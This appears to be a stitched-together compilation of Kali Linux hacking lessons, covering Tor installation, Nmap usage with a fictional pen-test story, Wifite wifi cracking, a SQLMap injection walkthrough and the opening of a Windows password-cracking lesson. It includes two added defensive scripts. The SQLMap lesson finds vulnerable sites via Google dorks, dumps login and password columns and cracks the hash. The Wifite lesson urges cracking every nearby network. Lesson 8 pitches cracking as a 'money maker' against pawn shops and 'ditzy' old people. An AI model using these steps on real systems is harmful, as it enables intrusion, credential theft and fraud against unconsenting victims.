"A new release for the stable Tor Browser is available from the Tor Browser Project page and also from our distribution directory," states the Tor project team. Tor is generally thought of as a place where users go to hide their activities and remain anonymous. Tor is an encrypted anonymizing network considered to be one of the most privacy-oriented services, and it is mostly used by activists and journalists to circumvent online censorship and surveillance efforts by various countries. However, late last year we saw a large-scale cyber attack on the Tor network that quietly seized some of its specialized servers called Directory Authorities (DA), the servers that help Tor clients find Tor relays in the anonymous network. On the other hand, last month 12 high-capacity Tor middle relays were launched by Polaris — a new initiative by Mozilla, the Tor Project and the Center for Democracy and Technology — in order to help build more privacy controls into technology. The addition of high-capacity middle relays to the Tor network helps relieve the limited capacity for simultaneous Tor connections.

Installing Tor in Kali Linux

Step 1: Getting the tor service ready
There are 3 ways of installing the Tor service in Kali Linux.
You can install Tor by following any of these options:

Option #1: Install Tor from Kali Repository
Tor is available in the Kali repository; to install it directly from the repository, open your Terminal and type:
apt-get install tor
If no error occurs, follow the second step.

Option #2: Install Tor from Debian Wheezy Repository
If you can't install Tor using the first method then you may try this option. In this way we are going to add the official Tor repository according to our Debian distribution. Not to be confused, Kali is actually based on Debian and it uses the package management from "Wheezy". So we are going to use "Wheezy" as our distribution. Now open your terminal and follow these steps:
Step #1: Add repo to sources.list file
Let's add the distribution to the list by opening the sources.list file:
leafpad /etc/apt/sources.list
Now add the following line at the bottom of the file:
deb http://deb.torproject.org/torproject.org wheezy main
Step #2: Add GPG Keys
Now we need to add the GPG key used to sign the packages by running the following commands:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
Step #3: Update package lists
Let's refresh our sources:
apt-get update
Step #4: Install signing keys
Now, before installing Tor, we must add the signing key:
apt-get install deb.torproject.org-keyring
Step #5: Install Tor from Debian repository
Finally:
apt-get install tor
Now Tor should be installed! If no error occurs, follow the second step.

Option #3: Install Tor from development branch
If you are an advanced user and you want to install Tor using the development branch then this method is for you.
Step #1: Add Tor project repository to sources.list
You need to add a different set of lines to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org wheezy main
deb http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
Step #2: Add GPG keys, keyring and install Tor
Then run the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -
apt-get update
apt-get install tor deb.torproject.org-keyring
Now Tor should be installed! If no error occurs, follow the second step.
Note: This release will provide you more features but it contains bugs too.

Option #4: Build and Install Tor from sources
If you want to build your own debs from source you must first add an appropriate deb-src line to sources.list:
deb-src http://deb.torproject.org/torproject.org wheezy main
deb-src http://deb.torproject.org/torproject.org tor-experimental-0.2.5.x-wheezy main
You also need to install the necessary packages to build your own debs and the packages needed to build Tor:
apt-get install build-essential fakeroot devscripts
apt-get build-dep tor
Then you can build Tor in ~/debian-packages:
mkdir ~/debian-packages; cd ~/debian-packages
apt-get source tor
cd tor-*
debuild -rfakeroot -uc -us
cd ..
Now you can install the new package:
dpkg -i tor_*.deb

Step 2: Downloading and Running Tor bundle
Download the Tor Bundle from here: https://www.torproject.org/projects/torbrowser.html.en
Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive:
tar -xvzf tor-browser-gnu-linux-i686-2.3.25-15-dev-LANG.tar.gz
or (for the 64-bit version):
tar -xvzf tor-browser-gnu-linux-x86_64-2.3.25-16-dev-LANG.tar.gz
(where LANG is the language listed in the filename).
Once that's done, switch to the Tor browser directory by running:
cd tor-browser_LANG
(where LANG is the language listed in the filename). To run the Tor Browser Bundle, execute the start-tor-browser script:
./start-tor-browser
This will launch Vidalia and, once that connects to Tor, it will launch Firefox.
Note: Do not unpack or run TBB as root (though in Kali Linux, it doesn't make any difference).

Lesson 5: Introduction to NMap

Nmap is a very useful tool, especially for identifying open ports subject to attacks and infiltration; its GUI is user friendly and boasts a wide variety of features. Nmap ("Network Mapper") is a free and open source utility for network exploration and security auditing. Many systems and network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. It was designed to rapidly scan large networks, but works fine against single hosts. Nmap runs on all major computer operating systems, and both console and graphical versions are available. This chapter uses fictional stories to provide a broad overview of Nmap and how it is typically used. An important legal section helps users avoid (or at least be aware of) controversial usage that could lead to ISP account cancellation or even civil and criminal charges. It also discusses the risks of crashing remote machines as well as miscellaneous issues such as the open source Nmap license (based on the GNU GPL), and copyright.

Nmap Overview and Demonstration

Sometimes the best way to understand something is to see it in action.
This section includes examples of Nmap used in (mostly) fictional yet typical circumstances. Nmap newbies should not expect to understand everything at once. This is simply a broad overview of features that are described in depth in later chapters. The "solutions" included throughout this book demonstrate many other common Nmap tasks for security auditors and network administrators.

Avatar Online

Felix dutifully arrives at work on December 15th, although he does not expect many structured tasks. The small San Francisco penetration-testing firm he works for has been quiet lately due to impending holidays. Felix spends business hours pursuing his latest hobby of building powerful Wi-Fi antennas for wireless assessments and war driving exploration. Nevertheless, Felix is hoping for more business. Hacking has been his hobby and fascination since a childhood spent learning everything he could about networking, security, Unix, and phone systems. Occasionally his curiosity took him too far, and Felix was almost swept up in the 1990 Operation Sundevil prosecutions. Fortunately Felix emerged from adolescence without a criminal record, while retaining his expert knowledge of security weaknesses. As a professional, he is able to perform the same types of network intrusions as before, but with the added benefit of contractual immunity from prosecution and even a paycheck! Rather than keeping his creative exploits secret, he can brag about them to client management when presenting his reports. So Felix was not disappointed when his boss interrupted his antenna soldering to announce that the sales department closed a pen-testing deal with the Avatar Online gaming company. Avatar Online (AO) is a small company working to create the next generation of massive multi-player online role-playing games (MMORPGs). Their product, inspired by the Metaverse envisioned in Neal Stephenson's Snow Crash, is fascinating but still highly confidential.
After witnessing the high-profile leak of Valve Software's upcoming game source code, AO quickly hired the security consultants. Felix's task is to initiate an external (from outside the firewall) vulnerability assessment while his partners work on physical security, source code auditing, social engineering, and so forth. Felix is permitted to exploit any vulnerabilities found. The first step in a vulnerability assessment is network discovery. This reconnaissance stage determines what IP address ranges the target is using, what hosts are available, what services those hosts are offering, general network topology details, and what firewall/filtering policies are in effect. Determining the IP ranges to scan would normally be an elaborate process involving ARIN (or another geographical registry) lookups, DNS queries and zone transfer attempts, various web sleuthing techniques, and more. But in this case, Avatar Online explicitly specified what networks they want tested: the corporate network on 6.209.24.0/24 and their production/DMZ systems residing on 6.207.0.0/22. Felix checks the IP whois records anyway and confirms that these IP ranges are allocated to AO[1]. Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless -n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster.
The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.1.

felix> nmap -sL 6.209.24.0/24 6.207.0.0/22
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for 6.209.24.4
...
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22)
Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23)
...
Nmap scan report for 6.207.0.0
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for ns2.avataronline.com (6.207.0.3)
Nmap scan report for ftp.avataronline.com (6.207.0.4)
Nmap scan report for 6.207.0.5
Nmap scan report for 6.207.0.6
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for 6.207.0.8
...
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for cluster-c121.avataronline.com (6.207.2.121)
Nmap scan report for cluster-c122.avataronline.com (6.207.2.122)
...
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
felix>

Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network.
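Felix's two checks on the list-scan output (does the address count match the CIDR blocks, and do all reverse-DNS names belong to the client) can be automated. The following is an added example, not code from the Nmap book; it parses a constructed, abridged copy of the Example 1.1 output and treats the two contracted netblocks and the avataronline.com domain as the approved scope.

```python
"""Scope check over Nmap list-scan (-sL) output.

Added example, not part of the Nmap book excerpt above. It parses the
"Nmap scan report for ..." lines, compares the address count with what the
client-supplied CIDR blocks imply (256 + 1024 = 1280) and flags any
reverse-DNS name that does not belong to the approved domain, the check
Felix does by eye before moving on to an intrusive scan.
"""
import ipaddress
import re

# Constructed sample input: an abridged copy of the Example 1.1 output.
SAMPLE_LIST_SCAN = """\
Starting Nmap ( http://nmap.org )
Nmap scan report for 6.209.24.0
Nmap scan report for fw.corp.avataronline.com (6.209.24.1)
Nmap scan report for dev2.corp.avataronline.com (6.209.24.2)
Nmap scan report for 6.209.24.3
Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21)
Nmap scan report for gw.avataronline.com (6.207.0.1)
Nmap scan report for ns1.avataronline.com (6.207.0.2)
Nmap scan report for www.avataronline.com (6.207.0.7)
Nmap scan report for cluster-c120.avataronline.com (6.207.2.120)
Nmap scan report for 6.207.3.255
Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds
"""

APPROVED_NETBLOCKS = ["6.209.24.0/24", "6.207.0.0/22"]  # the two blocks in the contract
APPROVED_DOMAIN = "avataronline.com"

# "Nmap scan report for name (ip)" when rDNS resolved, "... for ip" otherwise.
REPORT_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \((?P<ip1>[\d.]+)\)|(?P<ip2>[\d.]+))$"
)
DONE_RE = re.compile(r"^Nmap done: (?P<count>\d+) IP addresses")


def expected_address_count(netblocks):
    """Number of addresses the CIDR blocks cover (Felix's 1,280)."""
    return sum(ipaddress.ip_network(n).num_addresses for n in netblocks)


def parse_list_scan(text):
    """Return ({ip: rdns_name_or_None}, count from the 'Nmap done' line)."""
    hosts, reported = {}, None
    for line in text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            hosts[m.group("ip1") or m.group("ip2")] = m.group("name")
            continue
        m = DONE_RE.match(line)
        if m:
            reported = int(m.group("count"))
    return hosts, reported


def in_domain(name, domain):
    return name == domain or name.endswith("." + domain)


def scope_report(text, netblocks=APPROVED_NETBLOCKS, domain=APPROVED_DOMAIN):
    """Summarise whether the scan stayed inside the agreed scope."""
    hosts, reported = parse_list_scan(text)
    nets = [ipaddress.ip_network(n) for n in netblocks]
    expected = expected_address_count(netblocks)
    named = {ip: h for ip, h in hosts.items() if h}
    return {
        "expected_count": expected,
        "reported_count": reported,
        "count_matches": reported == expected,
        "named_hosts": len(named),
        # Addresses Nmap reported that lie outside the contracted blocks.
        "out_of_scope": sorted(
            ip for ip in hosts if not any(ipaddress.ip_address(ip) in n for n in nets)
        ),
        # rDNS names pointing at some other organisation: stop and re-check scope.
        "foreign_names": {ip: h for ip, h in named.items() if not in_domain(h, domain)},
    }


if __name__ == "__main__":
    for key, value in scope_report(SAMPLE_LIST_SCAN).items():
        print(f"{key}: {value}")
```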
He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command:
nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan%D 6.209.24.0/24 6.207.0.0/22

Intro – Nmap ("Network Mapper") is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.

1. How to open nmap
A. GUI method: Application → Kali Linux → Information gathering → DNS Analysis → nmap
B. Open a terminal, type nmap and hit enter
2. Scan a single IP address (whether the firewall is OFF or ON on the target PC)
Syntax – nmap IP address/hostname
Ex – nmap 192.168.75.131
Ex – nmap google.com
3. Boost up your nmap scan – using this command you can decrease scan time
Syntax – nmap -F IP address
Ex – nmap -F google.com
4. Scan multiple IP addresses or a subnet
A. Scan a range of IP addresses
Syntax – nmap IP address range
Ex – nmap 192.168.75.1-131
B. Scan a range of IP addresses using a wildcard
Ex – nmap 192.168.75.*
C. Scan an entire subnet
Ex – nmap 192.168.75.1/24
5. Turn on OS and version detection
Ex – nmap -O 192.168.75.131
6. Scan all TCP ports on the target IP
Ex – nmap -sT 192.168.75.131
7.
Scan a firewall for security weaknesses
A. Null scan – TCP Null scan to fool a firewall into generating a response
Ex – nmap -sN 192.168.75.131
B. FIN scan – TCP FIN scan to check a firewall
Ex – nmap -sF 192.168.75.131
C. TCP Xmas scan to check a firewall
Ex – nmap -sX 192.168.75.131
8. UDP scan – Scan a host for UDP services. This scan is used to view open UDP ports.
Ex – nmap -sU 192.168.75.131
9. Scan for IP protocols – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines.
Ex – nmap -sO 192.168.75.131
10. Detect remote service (server/daemon) version numbers
Ex – nmap -sV 192.168.75.131
11. Find out the most commonly used TCP ports
A. Using TCP SYN scan (stealthy scan)
Ex – nmap -sS 192.168.75.131
B. Using TCP connect scan
Ex – nmap -sT 192.168.75.131
C. Using TCP ACK scan
Ex – nmap -sA 192.168.75.131
D. Using TCP Window scan
Ex – nmap -sW 192.168.75.131
E. Using TCP Maimon scan
Ex – nmap -sM 192.168.75.131
12. List scan – this command is used to list the targets to scan
Ex – nmap -sL 192.168.75.131
13. Host discovery or ping scan – Scan a network and find out which servers and devices are up and running
Ex – nmap -sP 192.168.75.0/24
14. Scan a host protected by a firewall
Ex – nmap -PN 192.168.75.1

Lesson 6: Wifi Hacking the easy way: Using WIFITE

Wifite
While the aircrack-ng suite is a well known name in wireless hacking, the same can't be said about Wifite. Living in the shade of the greatness of the established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (e.g. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot.
I'm listing some features before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand the simple English instructions given by Wifite can use it on his own).

Features Of Wifite
- Sorts targets by signal strength (in dB); cracks closest access points first
- Automatically de-authenticates clients of hidden networks to reveal SSIDs
- Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
- Customizable settings (timeouts, packets/sec, etc)
- "Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
- All captured WPA handshakes are backed up to wifite.py's current directory
- Smart WPA de-authentication; cycles between all clients and broadcast deauths
- Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit
- Displays session summary at exit; shows any cracked keys
- All passwords saved to cracked.txt
- Built-in updater: ./wifite.py -upgrade

I find it worth mentioning here that not only does it hack wifi the easy way, it also hacks in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP method to speed up data packets.

Hacking WEP network
wifite -wep
You might even just use the command wifite. The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can expect it to hack the wifi in 10 mins approx.
Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag). Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the following:
wifite -help
This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacks:
WEP
-wep                only target WEP networks [off]
-pps <num>          set the number of packets per second to inject [600]
-wept <sec>         sec to wait for each attack, 0 implies endless [600]
-chopchop           use chopchop attack [on]
-arpreplay          use arpreplay attack [on]
-fragment           use fragmentation attack [on]
-caffelatte         use caffe-latte attack [on]
-p0841              use -p0841 attack [on]
-hirte              use hirte (cfrag) attack [on]
-nofakeauth         stop attack if fake authentication fails [off]
-wepca <n>          start cracking when number of ivs surpass n [10000]
-wepsave            save a copy of .cap files to this directory [off]

Troubleshooting
Wifite quits unexpectedly, stating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting."
You are most probably using Kali inside a virtual machine. A virtual machine does not support the host's internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows: anything other than a virtual machine, in general.
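The feature list above ("smart WPA de-authentication; cycles between all clients and broadcast deauths") describes exactly the traffic pattern a wireless IDS looks for. The following detector is an added example, not code from Wifite or from this tutorial; it runs over a constructed list of 802.11 management-frame records (timestamp, BSSID, destination MAC, subtype) and raises an alert when one BSSID emits a burst of deauth/disassoc frames in a short window, which a healthy access point rarely does.

```python
"""Deauthentication-burst detector.

Added example, not code from Wifite or from the tutorial above. Wifite's
"smart WPA de-authentication" cycles deauth frames between every client and
the broadcast address; on the defender's side that shows up as a burst of
deauth/disassoc management frames from one BSSID. Input is a constructed
list of frame records: (timestamp_seconds, bssid, destination_mac, subtype).
"""
from collections import defaultdict

SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
BROADCAST = "ff:ff:ff:ff:ff:ff"


def deauth_bursts(frames, window=10.0, threshold=10):
    """Return one alert per (bssid, time bucket) whose deauth/disassoc count
    reaches `threshold` inside a `window`-second bucket."""
    buckets = defaultdict(lambda: {"count": 0, "broadcast": 0, "targets": set()})
    for ts, bssid, dst, subtype in frames:
        if subtype not in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            continue  # beacons, probes etc. are not of interest here
        b = buckets[(bssid, int(ts // window))]
        b["count"] += 1
        b["targets"].add(dst)
        if dst == BROADCAST:
            b["broadcast"] += 1
    alerts = []
    for (bssid, bucket), b in sorted(buckets.items()):
        if b["count"] >= threshold:
            alerts.append({
                "bssid": bssid,
                "window_start": bucket * window,
                "count": b["count"],
                "broadcast": b["broadcast"],      # broadcast deauths are the strongest tell
                "targets": sorted(b["targets"]),  # how many clients were cycled through
            })
    return alerts


def build_sample():
    """Constructed capture: benign roaming deauths plus one scripted burst."""
    frames = [
        # One AP deauthenticating one client twice, minutes apart: normal.
        (100.0, "aa:aa:aa:aa:aa:01", "cc:cc:cc:cc:cc:01", SUBTYPE_DEAUTH),
        (400.0, "aa:aa:aa:aa:aa:01", "cc:cc:cc:cc:cc:01", SUBTYPE_DEAUTH),
        # A beacon from the second AP, ignored by the detector.
        (1000.5, "bb:bb:bb:bb:bb:01", BROADCAST, SUBTYPE_BEACON),
    ]
    # The cycling pattern: two clients and broadcast, ten frames per second.
    targets = ["cc:cc:cc:cc:cc:02", "cc:cc:cc:cc:cc:03", BROADCAST]
    for i in range(30):
        frames.append((1000.0 + i * 0.1, "bb:bb:bb:bb:bb:01", targets[i % 3], SUBTYPE_DEAUTH))
    return frames


if __name__ == "__main__":
    for alert in deauth_bursts(build_sample()):
        print(alert)
```

Thresholds are a tuning decision: enterprise APs with band steering do send legitimate deauths, so the broadcast count and the number of distinct targets per window separate a steering event from a cycling deauth flood.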
Lesson 7: SQL Injection using SQLMap

Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions.

SQL injection is a way of extracting user login info and other data from insecure SQL databases on companies' servers. It is one of the most common ways sites are hacked.

What is SQLMAP
sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

Features
- Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems.
- Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band.
- Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
- Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
- Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
- Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
- Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables.
This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain strings like name and pass.
- Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
- Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
- Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.
[Source: www.sqlmap.org]

Step 1: Find a Vulnerable Website
This is usually the toughest bit and takes longer than any other step. Those who know how to use Google Dorks know this already, but in case you don't, I have put together a number of strings that you can search in Google. Just copy and paste any of the lines into Google and Google will show you a number of search results.
Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website
You can google a list of google dork strings.
Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection
For every google dork string, you will get hundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection? There are multiple ways and I am sure people would argue which one is best, but to me the following is the simplest and most conclusive. Let's say you searched using this string inurl:item_id= and one of the search results shows a website like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15
Just add a single quotation mark ' at the end of the URL.
(Just to be sure: " is a double quotation mark and ' is a single quotation mark). So now your URL will become like this:
http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15'
If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirects you to a different page, move on to the next site in your Google search results page. See the example error below in the screenshot. I've obscured everything including URL and page design for obvious reasons.

Examples of SQLi Errors from Different Databases and Languages

Microsoft SQL Server
Server Error in '/' Application.
Unclosed quotation mark before the character string 'attack;'.
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code.
Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string 'attack;'.

MySQL Errors
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12
Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 12

Oracle Errors
java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208)
Error: SQLException java.sql.SQLException: ORA-01756: quoted string not properly terminated

PostgreSQL Errors
Query failed: ERROR: unterminated quoted string at or near "'''"

Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I've found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that vulnerable database. (this is also called enumerating number of columns).
As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command against your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
In here:
sqlmap = Name of sqlmap binary file
-u = Target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = Enumerate DBMS databases
This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So, we now have two databases that we can look into. information_schema is a standard database for almost every MySQL database. So our interest would be on the sqldummywebsite database.

Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find out that information, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table probably contains usernames and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection

Now we need to list all the columns of the target table user_info in the sqldummywebsite database using SQLMAP SQL injection. SQLMAP SQL injection makes it really easy; run the following command:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns

This returns 5 entries from the target table user_info of the sqldummywebsite database.

[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)

AHA! This is exactly what we are looking for: the target columns user_login and user_password.

Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection

SQLMAP SQL injection makes it easy! Just run the following command again:

sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump

Guess what, we now have the username from the database:

[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes

Almost there; we now only need the password for this user. The next step shows just that.

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You're probably getting used to how the SQLMAP SQL injection tool works. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump

TADA!! We have the password.

[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+

But hang on, this password looks funny. This can't be someone's password. Someone who leaves their website vulnerable like that just can't have a password like that. That is exactly right: this is a hashed password. What that means is that the password is encrypted, and now we need to decrypt it.

Step 7: Cracking password

So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?

Step 7.a: Identify Hash type

Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command line, type the following command and paste the hash value at the prompt:

hash-identifier

Excellent. So this is a DES(Unix) hash.

Step 7.b: Crack HASH using cudahashcat

First of all I need to know which hash mode to use for DES hashes. So let's check:

cudahashcat --help | grep DES

So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500. I am running a computer that has an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop I have an AMD ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudahashcat nor oclhashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website; search around.

I saved the hash value 24iYBc17xK0e. in the file DES.hash. Following is the command I am running:

cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt

Interesting find: the usual Hashcat was unable to determine the code for the DES hash (it's not in its help menu). However, both cudaHashcat and oclHashcat found and cracked it. Anyhow, here's the cracked password: abc123.

24iYBc17xK0e.:abc123

Sweet, we now even have the password for this user.

Lesson 8: Cracking Windows Passwords in Kali Linux

This is probably your number one money maker: pawn shops whose computers were forfeited and need to be sold, and citizens and old people who are just ditzy. Enjoy.

Crack and Reset the system password locally using Kali

